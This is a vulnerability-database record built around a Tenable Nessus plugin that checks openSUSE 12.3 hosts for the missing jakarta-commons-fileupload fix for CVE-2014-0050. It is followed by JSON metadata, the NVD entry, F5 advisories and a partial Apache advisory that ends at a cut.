ID OPENSUSE-2014-297.NASL Type nessus Reporter This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2014-06-13T00:00:00
Description
This jakarta-commons-fileupload update fixes the follwoing security
and non security issues :
bnc#862781: Fixed buffer overflow and resulting DoS
(CVE-2014-0050).
Removed gcj part and deprecated macros.
Moved from jpackage-utils to javapackage-tools.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from openSUSE Security Update openSUSE-2014-297.
#
# The text description of this plugin is (C) SUSE LLC.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(75324);
script_version("1.6");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_cve_id("CVE-2014-0050");
script_bugtraq_id(65400);
script_name(english:"openSUSE Security Update : jakarta-commons-fileupload (openSUSE-SU-2014:0528-1)");
script_summary(english:"Check for the openSUSE-2014-297 patch");
script_set_attribute(
attribute:"synopsis",
value:"The remote openSUSE host is missing a security update."
);
script_set_attribute(
attribute:"description",
value:
"This jakarta-commons-fileupload update fixes the follwoing security
and non security issues :
- bnc#862781: Fixed buffer overflow and resulting DoS
(CVE-2014-0050).
- Removed gcj part and deprecated macros.
- Moved from jpackage-utils to javapackage-tools."
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.novell.com/show_bug.cgi?id=862781"
);
script_set_attribute(
attribute:"see_also",
value:"https://lists.opensuse.org/opensuse-updates/2014-04/msg00041.html"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected jakarta-commons-fileupload packages."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:ND/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:jakarta-commons-fileupload");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:jakarta-commons-fileupload-javadoc");
script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:12.3");
script_set_attribute(attribute:"patch_publication_date", value:"2014/04/04");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/06/13");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"SuSE Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE");
if (release !~ "^(SUSE12\.3)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "12.3", release);
if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
flag = 0;
if ( rpm_check(release:"SUSE12.3", reference:"jakarta-commons-fileupload-1.1.1-114.8.1") ) flag++;
if ( rpm_check(release:"SUSE12.3", reference:"jakarta-commons-fileupload-javadoc-1.1.1-114.8.1") ) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
else security_hole(0);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "jakarta-commons-fileupload / jakarta-commons-fileupload-javadoc");
}
{"id": "OPENSUSE-2014-297.NASL", "bulletinFamily": "scanner", "title": "openSUSE Security Update : jakarta-commons-fileupload (openSUSE-SU-2014:0528-1)", "description": "This jakarta-commons-fileupload update fixes the follwoing security\nand non security issues :\n\n - bnc#862781: Fixed buffer overflow and resulting DoS\n (CVE-2014-0050).\n\n - Removed gcj part and deprecated macros.\n\n - Moved from jpackage-utils to javapackage-tools.", "published": "2014-06-13T00:00:00", "modified": "2014-06-13T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/75324", "reporter": "This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://lists.opensuse.org/opensuse-updates/2014-04/msg00041.html", "https://bugzilla.novell.com/show_bug.cgi?id=862781"], "cvelist": ["CVE-2014-0050"], "type": "nessus", "lastseen": "2021-01-20T12:27:30", "edition": 18, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-0050"]}, {"type": "f5", "idList": ["SOL15189", "F5:K15189"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30435", "SECURITYVULNS:DOC:32033", "SECURITYVULNS:VULN:14470"]}, {"type": "openvas", "idList": ["OPENVAS:867523", "OPENVAS:1361412562310807039", "OPENVAS:1361412562310702856", "OPENVAS:702856", "OPENVAS:1361412562310804251", "OPENVAS:1361412562310850747", "OPENVAS:1361412562310867519", "OPENVAS:1361412562310867523", "OPENVAS:867519", "OPENVAS:1361412562310120359"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-2856.NASL", "WEBSPHERE_PORTAL_CVE-2014-0050.NASL", "VMWARE_ORCHESTRATOR_VMSA_2014_0007.NASL", "TOMCAT_8_0_3.NASL", "REDHAT-RHSA-2014-0253.NASL", "ALA_ALAS-2014-312.NASL", "F5_BIGIP_SOL15189.NASL", "VMWARE_ORCHESTRATOR_APPLIANCE_VMSA_2014_0007.NASL", "MANDRIVA_MDVSA-2014-056.NASL", "TOMCAT_7_0_52.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2897-1:13B38", "DEBIAN:DSA-2856-1:D2DA2"]}, {"type": "fedora", "idList": ["FEDORA:EA6192175F", "FEDORA:58AC321FC4"]}, {"type": "exploitdb", "idList": ["EDB-ID:31615"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONF-32557", "ATLASSIAN:CONFSERVER-32557"]}, {"type": "amazon", "idList": ["ALAS-2014-312", "ALAS-2014-344"]}, {"type": "seebug", "idList": ["SSV:84935", "SSV:61443"]}, {"type": "suse", "idList": ["SUSE-SU-2014:0548-1"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:EB000848EE6583FA3B8F33FA4CDD34C0"]}, {"type": "redhat", "idList": ["RHSA-2014:0527", "RHSA-2014:0528", "RHSA-2014:0525", "RHSA-2014:0526", "RHSA-2014:0459", "RHSA-2014:0252", "RHSA-2014:0429", "RHSA-2014:0253", "RHSA-2014:0865"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/DOS/HTTP/APACHE_COMMONS_FILEUPLOAD_DOS"]}, {"type": "github", "idList": ["GHSA-XX68-JFCG-XMMF"]}, {"type": "jvn", "idList": ["JVN:14876762"]}, {"type": "zdt", "idList": ["1337DAY-ID-21887"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20140707-01-STRUTS2"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-0429", "ELSA-2014-0865", "ELSA-2014-0686"]}, {"type": "threatpost", "idList": ["THREATPOST:40B4CEF304ADBCA0734F292661E7810B"]}, {"type": "vmware", "idList": ["VMSA-2014-0007"]}, {"type": "ubuntu", "idList": ["USN-2130-1"]}, {"type": "centos", "idList": ["CESA-2014:0429", "CESA-2014:0865"]}], "modified": "2021-01-20T12:27:30", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-01-20T12:27:30", "rev": 2}, "vulnersScore": 7.5}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-297.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75324);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n\n script_name(english:\"openSUSE Security Update : jakarta-commons-fileupload (openSUSE-SU-2014:0528-1)\");\n script_summary(english:\"Check for the openSUSE-2014-297 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This jakarta-commons-fileupload update fixes the follwoing security\nand non security issues :\n\n - bnc#862781: Fixed buffer overflow and resulting DoS\n (CVE-2014-0050).\n\n - Removed gcj part and deprecated macros.\n\n - Moved from jpackage-utils to javapackage-tools.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=862781\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-04/msg00041.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jakarta-commons-fileupload packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:jakarta-commons-fileupload\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:jakarta-commons-fileupload-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"jakarta-commons-fileupload-1.1.1-114.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"jakarta-commons-fileupload-javadoc-1.1.1-114.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-fileupload / jakarta-commons-fileupload-javadoc\");\n}\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "75324", "cpe": ["cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:jakarta-commons-fileupload", "p-cpe:/a:novell:opensuse:jakarta-commons-fileupload-javadoc"], "scheme": null}
{"cve": [{"lastseen": "2020-12-09T19:58:19", "description": "MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions.\nThe previous CVSS assessment ( Base Score: 5.0 - AV:N/AC:L/AU:N/C:N/I:N/A:P) was provided at the time of initial analysis based on the best available published information at that time. The score has been updated to reflect the impact to Oracle products per <a href=http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html> Oracle Critical Patch Update Advisory - October 2015 </a>. Other products listed as vulnerable may or may not be similarly impacted.", "edition": 5, "cvss3": {}, "published": "2014-04-01T06:27:00", "title": "CVE-2014-0050", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0050"], "modified": "2018-10-09T19:35:00", "cpe": ["cpe:/a:apache:commons_fileupload:1.2.1", "cpe:/a:apache:tomcat:7.0.11", "cpe:/a:apache:tomcat:7.0.50", "cpe:/a:apache:tomcat:7.0.40", "cpe:/a:apache:tomcat:7.0.35", "cpe:/a:apache:tomcat:7.0.29", "cpe:/a:oracle:retail_applications:13.0", "cpe:/a:apache:tomcat:7.0.42", "cpe:/a:apache:tomcat:7.0.16", "cpe:/a:oracle:retail_applications:13.4", "cpe:/a:apache:commons_fileupload:1.2.2", "cpe:/a:apache:tomcat:7.0.32", "cpe:/a:apache:commons_fileupload:1.0", "cpe:/a:apache:tomcat:7.0.41", "cpe:/a:apache:tomcat:7.0.49", "cpe:/a:apache:tomcat:7.0.4", "cpe:/a:apache:tomcat:7.0.36", "cpe:/a:apache:tomcat:8.0.0", "cpe:/a:apache:tomcat:7.0.23", "cpe:/a:oracle:retail_applications:13.1", "cpe:/a:apache:tomcat:7.0.37", "cpe:/a:apache:tomcat:7.0.46", "cpe:/a:apache:tomcat:7.0.20", "cpe:/a:apache:tomcat:7.0.3", "cpe:/a:apache:tomcat:7.0.48", "cpe:/a:apache:tomcat:7.0.7", "cpe:/a:apache:tomcat:7.0.24", "cpe:/a:oracle:retail_applications:13.3", "cpe:/a:apache:tomcat:7.0.28", "cpe:/a:apache:tomcat:7.0.44", "cpe:/a:apache:tomcat:7.0.27", "cpe:/a:apache:tomcat:7.0.45", "cpe:/a:apache:tomcat:7.0.13", "cpe:/a:apache:tomcat:7.0.0", "cpe:/a:oracle:retail_applications:12.0", "cpe:/a:apache:tomcat:7.0.15", "cpe:/a:apache:tomcat:7.0.2", "cpe:/a:apache:tomcat:7.0.25", "cpe:/a:oracle:retail_applications:14.0", "cpe:/a:apache:tomcat:7.0.12", "cpe:/a:apache:commons_fileupload:1.2", "cpe:/a:apache:tomcat:7.0.38", "cpe:/a:apache:tomcat:7.0.18", "cpe:/a:apache:commons_fileupload:1.1", "cpe:/a:apache:tomcat:7.0.30", "cpe:/a:apache:tomcat:7.0.22", "cpe:/a:apache:tomcat:7.0.26", "cpe:/a:apache:tomcat:7.0.19", "cpe:/a:apache:tomcat:7.0.33", "cpe:/a:apache:commons_fileupload:1.1.1", "cpe:/a:oracle:retail_applications:13.2", "cpe:/a:apache:tomcat:7.0.17", "cpe:/a:apache:tomcat:7.0.5", "cpe:/a:apache:tomcat:7.0.39", "cpe:/a:apache:tomcat:7.0.9", "cpe:/a:apache:tomcat:7.0.1", "cpe:/a:apache:tomcat:7.0.8", "cpe:/a:apache:tomcat:7.0.47", "cpe:/a:apache:tomcat:7.0.34", "cpe:/a:apache:tomcat:7.0.6", "cpe:/a:apache:tomcat:7.0.14", "cpe:/a:apache:tomcat:7.0.21", "cpe:/a:oracle:retail_applications:12.0in", "cpe:/a:apache:commons_fileupload:1.3", "cpe:/a:apache:tomcat:7.0.10", "cpe:/a:apache:tomcat:7.0.31", "cpe:/a:apache:tomcat:8.0.1", "cpe:/a:apache:tomcat:7.0.43"], "id": "CVE-2014-0050", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0050", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:tomcat:7.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:commons_fileupload:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.50:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.44:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.34:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:13.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.38:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.43:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:commons_fileupload:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.49:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.48:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:commons_fileupload:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.39:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.42:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.2:beta:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:13.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.46:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.4:beta:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.45:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:commons_fileupload:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:commons_fileupload:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.47:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.0:beta:*:*:*:*:*:*", "cpe:2.3:a:apache:commons_fileupload:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:12.0in:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.41:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:rc10:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:commons_fileupload:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:13.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.40:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:13.4:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2019-07-02T20:43:47", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "description": "\nF5 Product Development has assigned ID 452318 (BIG-IP) and ID 452803 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H455619 on the **Diagnostics **> **Identified **> **High **screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM| 11.0.0 - 11.5.4 \n10.0.0 - 10.2.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP AAM| 11.4.0 - 11.5.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10| Configuration utility \nBIG-IP AFM| 11.3.0 - 11.5.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10| Configuration utility \nBIG-IP Analytics| 11.0.0 - 11.5.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP APM| 11.0.0 - 11.5.4 \n10.1.0 - 10.2.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP ASM| 11.0.0 - 11.5.4 \n10.0.0 - 10.2.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| 11.2.1 HF16| Configuration utility \nBIG-IP GTM| 11.0.0 - 11.5.4 \n10.0.0 - 10.2.4| 11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP Link Controller| 11.0.0 - 11.5.4 \n10.0.0 - 10.2.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP PEM| 11.3.0 - 11.5.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10| Configuration utility \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4| 11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| 11.2.1 HF16| Configuration utility \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| 11.2.1 HF16| Configuration utility \nARX| None| 6.0.0 - 6.4.0| None \nEnterprise Manager| 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0| None| Configuration utility \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| None\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit access to the Configuration utility only over a secure network.\n\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents.](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "edition": 1, "modified": "2018-02-06T01:03:00", "published": "2014-04-19T00:53:00", "id": "F5:K15189", "href": "https://support.f5.com/csp/article/K15189", "title": "Apache Commons FileUpload vulnerability CVE-2014-0050", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2016-09-26T17:22:52", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit access to the Configuration utility only over a secure network.\n\nSupplemental Information\n\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2016-08-16T00:00:00", "published": "2014-04-18T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15189.html", "id": "SOL15189", "title": "SOL15189 - Apache Commons FileUpload vulnerability CVE-2014-0050", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nCVE-2014-0050 Apache Commons FileUpload and Apache Tomcat DoS\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\n- - Commons FileUpload 1.0 to 1.3\r\n- - Apache Tomcat 8.0.0-RC1 to 8.0.1\r\n- - Apache Tomcat 7.0.0 to 7.0.50\r\n- - Apache Tomcat 6 and earlier are not affected\r\n\r\nApache Tomcat 7 and Apache Tomcat 8 use a packaged renamed copy of\r\nApache Commons FileUpload to implement the requirement of the Servlet\r\n3.0 and later specifications to support the processing of\r\nmime-multipart requests. Tomcat 7 and 8 are therefore affected by this\r\nissue. While Tomcat 6 uses Commons FileUpload as part of the Manager\r\napplication, access to that functionality is limited to authenticated\r\nadministrators.\r\n\r\nDescription:\r\nIt is possible to craft a malformed Content-Type header for a\r\nmultipart request that causes Apache Commons FileUpload to enter an\r\ninfinite loop. A malicious user could, therefore, craft a malformed\r\nrequest that triggered a denial of service.\r\nThis issue was reported responsibly to the Apache Software Foundation\r\nvia JPCERT but an error in addressing an e-mail led to the unintended\r\nearly disclosure of this issue[1].\r\n\r\nMitigation:\r\nUsers of affected versions should apply one of the following mitigations\r\n- - Upgrade to Apache Commons FileUpload 1.3.1 or later once released\r\n- - Upgrade to Apache Tomcat 8.0.2 or later once released\r\n- - Upgrade to Apache Tomcat 7.0.51 or later once released\r\n- - Apply the appropriate patch\r\n - Commons FileUpload: 